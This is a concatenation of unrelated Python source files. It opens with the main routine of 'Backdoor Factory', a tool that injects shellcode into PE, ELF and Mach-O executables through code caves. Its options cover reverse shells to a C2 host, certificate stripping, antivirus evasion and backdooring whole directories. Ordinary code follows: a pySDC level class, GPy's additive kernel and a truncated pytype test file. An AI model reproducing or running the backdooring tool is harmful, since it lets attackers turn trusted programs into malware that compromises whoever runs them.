" ____ ____ ______ "
" __ \n"
" / __ )/ __ \/ ____/___ "
"______/ /_____ _______ __\n"
" / __ / / / / /_ / __ `/"
" ___/ __/ __ \/ ___/ / / /\n"
" / /_/ / /_/ / __/ / /_/ /"
" /__/ /_/ /_/ / / / /_/ /\n"
"/_____/_____/_/ \__,_/"
"\___/\__/\____/_/ \__, /\n"
" "
" /____/\n"]
signal.signal(signal.SIGINT, signal_handler)
parser = OptionParser()
parser.add_option("-f", "--file", dest="FILE", action="store",
type="string",
help="File to backdoor")
parser.add_option("-s", "--shell", default="show", dest="SHELL",
action="store", type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads."
)
parser.add_option("-H", "--hostip", default=None, dest="HOST",
action="store", type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P", "--port", default=None, dest="PORT",
action="store", type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
default=False, action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary."
)
parser.add_option("-a", "--add_new_section", default=False,
dest="ADD_SECTION", action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U", "--user_shellcode", default=None,
dest="SUPPLIED_SHELLCODE", action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting."
)
parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
action="store", type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
action="store", type="string",
help="The backdoor output file")
parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
action="store", type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d", "--directory", dest="DIR", action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w", "--change_access", default=True,
dest="CHANGE_ACCESS", action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
default=False, action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
type="int", action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
default=False, action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted."
)
parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true",
help="Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true",
help="Kills the banner."
)
parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
type='string',
action="store", help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false",
help="Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes."
)
parser.add_option("-R", "--runas_admin", dest="CHECK_ADMIN", default=False, action="store_true",
help="Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. Doing this "
"slows patching speed significantly."
)
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store",
help="For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL."
)
parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int",
help="For payloads that have the ability to beacon out, set the time in secs"
)
parser.add_option("-m", "--patch-method", dest="PATCH_METHOD", default="manual", action="store",
type="string", help="Patching methods for PE files, 'manual' and 'automatic'")
(options, args) = parser.parse_args()
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if options.NO_BANNER is False:
print choice(menu)
print author
print version
time.sleep(1)
else:
print "\t Backdoor Factory"
print author
print version
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
print ("You are going to backdoor the following "
"items in the %s directory:"
% options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print ("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_macho()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print ("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
if options.INJECTOR is True:
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
supported_file.injector()
sys.exit()
if not options.FILE:
parser.print_help()
sys.exit()
#OUTPUT = output_options(options.FILE, options.OUTPUT)
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
else:
print "Not supported."
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))
#END BDF MAIN
if __name__ == "__main__":
bdfMain()
| |
import copy as cp
import logging
from pySDC import Stats as statclass
class level():
"""
Level class containing all management functionality for a single level
A level contains all data structures, types and objects to perform sweeps on this particular level. It does not
know about other levels.
Attributes:
__sweep: a private instance of a sweeper class (accessed via property)
__prob: a private instance of a problem class (accessed via property)
params: parameter object containing the custom parameters passed by the user
status: status object
uend: dof values at the right end point of the interval
u: dof values at the nodes (+uold for saving data during restriction)
f: RHS values at the nodes (+fold for saving data during restriction)
tau: FAS correction, allocated via step class if necessary
id: custom string naming this level
logger: a logging object for level-dependent output
__step: link to the step where this level is part of (set from the outside by the step)
__hooks: a private instance of a hooks class
__slots__: list of attributes to avoid accidential creation of new class attributes
"""
class cstatus():
"""
Helper class for status objects
Attributes:
residual: current residual
unlocked: indicates if the data on this level can be used
updated: indicates if the data on this level is new
"""
def __init__(self):
"""
Initialization routine
"""
self.residual = None #FIXME: isn't that obsolete?
self.unlocked = False
self.updated = False
__slots__ = ('__prob','__sweep','uend','u','uold','f','fold','tau','status','params','id','__step','id','__tag',
'__hooks')
def __init__(self, problem_class, problem_params, dtype_u, dtype_f, sweeper_class,
sweeper_params, level_params, hook_class, id):
"""
Initialization routine
Args:
problem_class: problem class
problem_params: parameters for the problem to be initialized
dtype_u: data type of the dofs
dtype_f: data type of the RHS
sweeper_class: sweeper class
sweeper_params: parameters for the sweeper (contains collocation)
level_params: parameters given by the user, will be added as attributes
hook_class: class to add hooks (e.g. for output and diag)
id: custom string naming this level
"""
# short helper class to add params as attributes
class pars():
def __init__(self,params):
defaults = dict()
defaults['restol'] = 0.0
for k,v in defaults.items():
setattr(self,k,v)
for k,v in params.items():
setattr(self,k,v)
# instantiate sweeper, problem and hooks
self.__sweep = sweeper_class(sweeper_params)
self.__prob = problem_class(problem_params,dtype_u,dtype_f)
self.__hooks = hook_class()
# set level parameters and status
self.params = pars(level_params)
self.status = level.cstatus()
# empty data the nodes, the right end point and tau
self.uend = None
self.u = [None] * (self.sweep.coll.num_nodes+1)
self.uold = [None] * (self.sweep.coll.num_nodes+1)
self.f = [None] * (self.sweep.coll.num_nodes+1)
self.fold = [None] * (self.sweep.coll.num_nodes+1)
self.tau = None
# set name
self.id = id
# dummy step variable, will be defined by registration at step
self.__step = None
# pass this level to the sweeper for easy access
self.sweep._sweeper__set_level(self)
self.hooks._hooks__set_level(self)
self.__tag = None
def reset_level(self):
"""
Routine to clean-up the level for the next time step
"""
# reset status
self.status = level.cstatus()
# all data back to None
self.uend = None
self.u = [None] * (self.sweep.coll.num_nodes+1)
self.uold = [None] * (self.sweep.coll.num_nodes+1)
self.f = [None] * (self.sweep.coll.num_nodes+1)
self.fold = [None] * (self.sweep.coll.num_nodes+1)
def __add_tau(self):
"""
Routine to add memory for the FAS correction
This will be called by the step if this level is not the finest one.
"""
if self.tau is None:
self.tau = [None] * self.sweep.coll.num_nodes
else:
raise WTF #FIXME
def __set_step(self,S):
"""
Defines the step this level belongs to (no explicit setter)
"""
self.__step = S
@property
def sweep(self):
"""
Getter for the sweeper
"""
return self.__sweep
@property
def hooks(self):
"""
Getter for the hooks
"""
return self.__hooks
@property
def prob(self):
"""
Getter for the problem
"""
return self.__prob
@property
def time(self):
"""
Meta-getter for the current time (only passing the step's time)
"""
return self.__step.status.time
@property
def dt(self):
"""
Meta-getter for the step size (only passing the step's step size)
"""
return self.__step.status.dt
@property
def iter(self):
"""
Meta-getter for the iteration (only passing the step's iteration)
"""
return self.__step.status.iter
@property
def dt(self):
"""
Meta-getter for the step size (only passing the step's step size)
"""
return self.__step.status.dt
@property
def tag(self):
"""
Getter for tag
Returns:
tag
"""
return self.__tag
@tag.setter
def tag(self,t):
"""
Setter for tag
Args:
s: new tag
"""
self.__tag = t
| |
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
import itertools
from paramz.caching import Cache_this
from .kern import CombinationKernel, Kern
from functools import reduce
class Add(CombinationKernel):
"""
Add given list of kernels together.
propagates gradients through.
This kernel will take over the active dims of it's subkernels passed in.
NOTE: The subkernels will be copies of the original kernels, to prevent
unexpected behavior.
"""
def __init__(self, subkerns, name='sum'):
_newkerns = []
for kern in subkerns:
if isinstance(kern, Add):
for part in kern.parts:
#kern.unlink_parameter(part)
_newkerns.append(part.copy())
else:
_newkerns.append(kern.copy())
super(Add, self).__init__(_newkerns, name)
self._exact_psicomp = self._check_exact_psicomp()
def _check_exact_psicomp(self):
from .. import RBF,Linear,Bias,White
n_kerns = len(self.parts)
n_rbf = len([k for k in self.parts if isinstance(k,RBF)])
n_linear = len([k for k in self.parts if isinstance(k,Linear)])
n_bias = len([k for k in self.parts if isinstance(k,Bias)])
n_white = len([k for k in self.parts if isinstance(k,White)])
n_others = n_kerns - n_rbf - n_linear - n_bias - n_white
if n_rbf+n_linear<=1 and n_bias<=1 and n_white<=1 and n_others==0:
return True
else:
return False
@Cache_this(limit=3, force_kwargs=['which_parts'])
def K(self, X, X2=None, which_parts=None):
"""
Add all kernels together.
If a list of parts (of this kernel!) `which_parts` is given, only
the parts of the list are taken to compute the covariance.
"""
if which_parts is None:
which_parts = self.parts
elif not isinstance(which_parts, (list, tuple)):
# if only one part is given
which_parts = [which_parts]
return reduce(np.add, (p.K(X, X2) for p in which_parts))
@Cache_this(limit=3, force_kwargs=['which_parts'])
def Kdiag(self, X, which_parts=None):
if which_parts is None:
which_parts = self.parts
elif not isinstance(which_parts, (list, tuple)):
# if only one part is given
which_parts = [which_parts]
return reduce(np.add, (p.Kdiag(X) for p in which_parts))
def update_gradients_full(self, dL_dK, X, X2=None):
[p.update_gradients_full(dL_dK, X, X2) for p in self.parts if not p.is_fixed]
def update_gradients_diag(self, dL_dK, X):
[p.update_gradients_diag(dL_dK, X) for p in self.parts]
def gradients_X(self, dL_dK, X, X2=None):
"""Compute the gradient of the objective function with respect to X.
:param dL_dK: An array of gradients of the objective function with respect to the covariance function.
:type dL_dK: np.ndarray (num_samples x num_inducing)
:param X: Observed data inputs
:type X: np.ndarray (num_samples x input_dim)
:param X2: Observed data inputs (optional, defaults to X)
:type X2: np.ndarray (num_inducing x input_dim)"""
target = np.zeros(X.shape)
[target.__iadd__(p.gradients_X(dL_dK, X, X2)) for p in self.parts]
return target
def gradients_X_diag(self, dL_dKdiag, X):
target = np.zeros(X.shape)
[target.__iadd__(p.gradients_X_diag(dL_dKdiag, X)) for p in self.parts]
return target
def gradients_XX(self, dL_dK, X, X2):
if X2 is None:
target = np.zeros((X.shape[0], X.shape[0], X.shape[1], X.shape[1]))
else:
target = np.zeros((X.shape[0], X2.shape[0], X.shape[1], X.shape[1]))
#else: # diagonal covariance
# if X2 is None:
# target = np.zeros((X.shape[0], X.shape[0], X.shape[1]))
# else:
# target = np.zeros((X.shape[0], X2.shape[0], X.shape[1]))
[target.__iadd__(p.gradients_XX(dL_dK, X, X2)) for p in self.parts]
return target
def gradients_XX_diag(self, dL_dKdiag, X):
target = np.zeros(X.shape+(X.shape[1],))
[target.__iadd__(p.gradients_XX_diag(dL_dKdiag, X)) for p in self.parts]
return target
@Cache_this(limit=3, force_kwargs=['which_parts'])
def psi0(self, Z, variational_posterior):
if not self._exact_psicomp: return Kern.psi0(self,Z,variational_posterior)
return reduce(np.add, (p.psi0(Z, variational_posterior) for p in self.parts))
@Cache_this(limit=3, force_kwargs=['which_parts'])
def psi1(self, Z, variational_posterior):
if not self._exact_psicomp: return Kern.psi1(self,Z,variational_posterior)
return reduce(np.add, (p.psi1(Z, variational_posterior) for p in self.parts))
@Cache_this(limit=3, force_kwargs=['which_parts'])
def psi2(self, Z, variational_posterior):
if not self._exact_psicomp: return Kern.psi2(self,Z,variational_posterior)
psi2 = reduce(np.add, (p.psi2(Z, variational_posterior) for p in self.parts))
#return psi2
# compute the "cross" terms
from .static import White, Bias
from .rbf import RBF
#from rbf_inv import RBFInv
from .linear import Linear
#ffrom fixed import Fixed
for p1, p2 in itertools.combinations(self.parts, 2):
# i1, i2 = p1._all_dims_active, p2._all_dims_active
# white doesn;t combine with anything
if isinstance(p1, White) or isinstance(p2, White):
pass
# rbf X bias
#elif isinstance(p1, (Bias, Fixed)) and isinstance(p2, (RBF, RBFInv)):
elif isinstance(p1, Bias) and isinstance(p2, (RBF, Linear)):
tmp = p2.psi1(Z, variational_posterior).sum(axis=0)
psi2 += p1.variance * (tmp[:,None]+tmp[None,:]) #(tmp[:, :, None] + tmp[:, None, :])
#elif isinstance(p2, (Bias, Fixed)) and isinstance(p1, (RBF, RBFInv)):
elif isinstance(p2, Bias) and isinstance(p1, (RBF, Linear)):
tmp = p1.psi1(Z, variational_posterior).sum(axis=0)
psi2 += p2.variance * (tmp[:,None]+tmp[None,:]) #(tmp[:, :, None] + tmp[:, None, :])
elif isinstance(p2, (RBF, Linear)) and isinstance(p1, (RBF, Linear)):
assert np.intersect1d(p1._all_dims_active, p2._all_dims_active).size == 0, "only non overlapping kernel dimensions allowed so far"
tmp1 = p1.psi1(Z, variational_posterior)
tmp2 = p2.psi1(Z, variational_posterior)
psi2 += np.einsum('nm,no->mo',tmp1,tmp2)+np.einsum('nm,no->mo',tmp2,tmp1)
#(tmp1[:, :, None] * tmp2[:, None, :]) + (tmp2[:, :, None] * tmp1[:, None, :])
else:
raise NotImplementedError("psi2 cannot be computed for this kernel")
return psi2
@Cache_this(limit=3, force_kwargs=['which_parts'])
def psi2n(self, Z, variational_posterior):
if not self._exact_psicomp: return Kern.psi2n(self, Z, variational_posterior)
psi2 = reduce(np.add, (p.psi2n(Z, variational_posterior) for p in self.parts))
#return psi2
# compute the "cross" terms
from .static import White, Bias
from .rbf import RBF
#from rbf_inv import RBFInv
from .linear import Linear
#ffrom fixed import Fixed
for p1, p2 in itertools.combinations(self.parts, 2):
# i1, i2 = p1._all_dims_active, p2._all_dims_active
# white doesn;t combine with anything
if isinstance(p1, White) or isinstance(p2, White):
pass
# rbf X bias
#elif isinstance(p1, (Bias, Fixed)) and isinstance(p2, (RBF, RBFInv)):
elif isinstance(p1, Bias) and isinstance(p2, (RBF, Linear)):
tmp = p2.psi1(Z, variational_posterior)
psi2 += p1.variance * (tmp[:, :, None] + tmp[:, None, :])
#elif isinstance(p2, (Bias, Fixed)) and isinstance(p1, (RBF, RBFInv)):
elif isinstance(p2, Bias) and isinstance(p1, (RBF, Linear)):
tmp = p1.psi1(Z, variational_posterior)
psi2 += p2.variance * (tmp[:, :, None] + tmp[:, None, :])
elif isinstance(p2, (RBF, Linear)) and isinstance(p1, (RBF, Linear)):
assert np.intersect1d(p1._all_dims_active, p2._all_dims_active).size == 0, "only non overlapping kernel dimensions allowed so far"
tmp1 = p1.psi1(Z, variational_posterior)
tmp2 = p2.psi1(Z, variational_posterior)
psi2 += np.einsum('nm,no->nmo',tmp1,tmp2)+np.einsum('nm,no->nmo',tmp2,tmp1)
#(tmp1[:, :, None] * tmp2[:, None, :]) + (tmp2[:, :, None] * tmp1[:, None, :])
else:
raise NotImplementedError("psi2 cannot be computed for this kernel")
return psi2
def update_gradients_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
tmp = dL_dpsi2.sum(0)+ dL_dpsi2.sum(1) if len(dL_dpsi2.shape)==2 else dL_dpsi2.sum(2)+ dL_dpsi2.sum(1)
if not self._exact_psicomp: return Kern.update_gradients_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior)
from .static import White, Bias
for p1 in self.parts:
#compute the effective dL_dpsi1. Extra terms appear becaue of the cross terms in psi2!
eff_dL_dpsi1 = dL_dpsi1.copy()
for p2 in self.parts:
if p2 is p1:
continue
if isinstance(p2, White):
continue
elif isinstance(p2, Bias):
eff_dL_dpsi1 += tmp * p2.variance
else:# np.setdiff1d(p1._all_dims_active, ar2, assume_unique): # TODO: Careful, not correct for overlapping _all_dims_active
eff_dL_dpsi1 += tmp * p2.psi1(Z, variational_posterior)
p1.update_gradients_expectations(dL_dpsi0, eff_dL_dpsi1, dL_dpsi2, Z, variational_posterior)
def gradients_Z_expectations(self, dL_psi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
tmp = dL_dpsi2.sum(0)+ dL_dpsi2.sum(1) if len(dL_dpsi2.shape)==2 else dL_dpsi2.sum(2)+ dL_dpsi2.sum(1)
if not self._exact_psicomp: return Kern.gradients_Z_expectations(self, dL_psi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior)
from .static import White, Bias
target = np.zeros(Z.shape)
for p1 in self.parts:
#compute the effective dL_dpsi1. extra terms appear becaue of the cross terms in psi2!
eff_dL_dpsi1 = dL_dpsi1.copy()
for p2 in self.parts:
if p2 is p1:
continue
if isinstance(p2, White):
continue
elif isinstance(p2, Bias):
eff_dL_dpsi1 += tmp * p2.variance
else:
eff_dL_dpsi1 += tmp * p2.psi1(Z, variational_posterior)
target += p1.gradients_Z_expectations(dL_psi0, eff_dL_dpsi1, dL_dpsi2, Z, variational_posterior)
return target
def gradients_qX_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
tmp = dL_dpsi2.sum(0)+ dL_dpsi2.sum(1) if len(dL_dpsi2.shape)==2 else dL_dpsi2.sum(2)+ dL_dpsi2.sum(1)
if not self._exact_psicomp: return Kern.gradients_qX_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior)
from .static import White, Bias
target_grads = [np.zeros(v.shape) for v in variational_posterior.parameters]
for p1 in self.parameters:
#compute the effective dL_dpsi1. extra terms appear becaue of the cross terms in psi2!
eff_dL_dpsi1 = dL_dpsi1.copy()
for p2 in self.parameters:
if p2 is p1:
continue
if isinstance(p2, White):
continue
elif isinstance(p2, Bias):
eff_dL_dpsi1 += tmp * p2.variance
else:
eff_dL_dpsi1 += tmp * p2.psi1(Z, variational_posterior)
grads = p1.gradients_qX_expectations(dL_dpsi0, eff_dL_dpsi1, dL_dpsi2, Z, variational_posterior)
[np.add(target_grads[i],grads[i],target_grads[i]) for i in range(len(grads))]
return target_grads
#def add(self, other):
# parts = self.parts
# if 0:#isinstance(other, Add):
# #other_params = other.parameters[:]
# for p in other.parts[:]:
# other.unlink_parameter(p)
# parts.extend(other.parts)
# #self.link_parameters(*other_params)
#
# else:
# #self.link_parameter(other)
# parts.append(other)
# #self.input_dim, self._all_dims_active = self.get_input_dim_active_dims(parts)
# return Add([p for p in parts], self.name)
def input_sensitivity(self, summarize=True):
if summarize:
i_s = np.zeros((self.input_dim))
for k in self.parts:
i_s[k._all_dims_active] += k.input_sensitivity(summarize)
return i_s
else:
return super(Add, self).input_sensitivity(summarize)
def sde_update_gradient_full(self, gradients):
"""
Update gradient in the order in which parameters are represented in the
kernel
"""
part_start_param_index = 0
for p in self.parts:
if not p.is_fixed:
part_param_num = len(p.param_array) # number of parameters in the part
p.sde_update_gradient_full(gradients[part_start_param_index:(part_start_param_index+part_param_num)])
part_start_param_index += part_param_num
def sde(self):
"""
Support adding kernels for sde representation
"""
import scipy.linalg as la
F = None
L = None
Qc = None
H = None
Pinf = None
P0 = None
dF = None
dQc = None
dPinf = None
dP0 = None
n = 0
nq = 0
nd = 0
# Assign models
for p in self.parts:
(Ft,Lt,Qct,Ht,Pinft,P0t,dFt,dQct,dPinft,dP0t) = p.sde()
F = la.block_diag(F,Ft) if (F is not None) else Ft
L = la.block_diag(L,Lt) if (L is not None) else Lt
Qc = la.block_diag(Qc,Qct) if (Qc is not None) else Qct
H = np.hstack((H,Ht)) if (H is not None) else Ht
Pinf = la.block_diag(Pinf,Pinft) if (Pinf is not None) else Pinft
P0 = la.block_diag(P0,P0t) if (P0 is not None) else P0t
if dF is not None:
dF = np.pad(dF,((0,dFt.shape[0]),(0,dFt.shape[1]),(0,dFt.shape[2])),
'constant', constant_values=0)
dF[-dFt.shape[0]:,-dFt.shape[1]:,-dFt.shape[2]:] = dFt
else:
dF = dFt
if dQc is not None:
dQc = np.pad(dQc,((0,dQct.shape[0]),(0,dQct.shape[1]),(0,dQct.shape[2])),
'constant', constant_values=0)
dQc[-dQct.shape[0]:,-dQct.shape[1]:,-dQct.shape[2]:] = dQct
else:
dQc = dQct
if dPinf is not None:
dPinf = np.pad(dPinf,((0,dPinft.shape[0]),(0,dPinft.shape[1]),(0,dPinft.shape[2])),
'constant', constant_values=0)
dPinf[-dPinft.shape[0]:,-dPinft.shape[1]:,-dPinft.shape[2]:] = dPinft
else:
dPinf = dPinft
if dP0 is not None:
dP0 = np.pad(dP0,((0,dP0t.shape[0]),(0,dP0t.shape[1]),(0,dP0t.shape[2])),
'constant', constant_values=0)
dP0[-dP0t.shape[0]:,-dP0t.shape[1]:,-dP0t.shape[2]:] = dP0t
else:
dP0 = dP0t
n += Ft.shape[0]
nq += Qct.shape[0]
nd += dFt.shape[2]
assert (F.shape[0] == n and F.shape[1]==n), "SDE add: Check of F Dimensions failed"
assert (L.shape[0] == n and L.shape[1]==nq), "SDE add: Check of L Dimensions failed"
assert (Qc.shape[0] == nq and Qc.shape[1]==nq), "SDE add: Check of Qc Dimensions failed"
assert (H.shape[0] == 1 and H.shape[1]==n), "SDE add: Check of H Dimensions failed"
assert (Pinf.shape[0] == n and Pinf.shape[1]==n), "SDE add: Check of Pinf Dimensions failed"
assert (P0.shape[0] == n and P0.shape[1]==n), "SDE add: Check of P0 Dimensions failed"
assert (dF.shape[0] == n and dF.shape[1]==n and dF.shape[2]==nd), "SDE add: Check of dF Dimensions failed"
assert (dQc.shape[0] == nq and dQc.shape[1]==nq and dQc.shape[2]==nd), "SDE add: Check of dQc Dimensions failed"
assert (dPinf.shape[0] == n and dPinf.shape[1]==n and dPinf.shape[2]==nd), "SDE add: Check of dPinf Dimensions failed"
assert (dP0.shape[0] == n and dP0.shape[1]==n and dP0.shape[2]==nd), "SDE add: Check of dP0 Dimensions failed"
return (F,L,Qc,H,Pinf,P0,dF,dQc,dPinf,dP0)
| |
"""Tests for import."""
import unittest
from pytype import utils
from pytype.tests import test_inference
class ImportTest(test_inference.InferenceTest):
"""Tests for import."""
def testBasicImport(self):
with self.Infer("""\
import sys
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
""")
def testBasicImport2(self):
with self.Infer("""\
import bad_import
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
bad_import: ?
""")
def testFromImportSmoke(self):
self.assert_ok("""\
from sys import exit
from path.to.module import bar, baz
""")
def testPathImport(self):
with utils.Tempdir() as d:
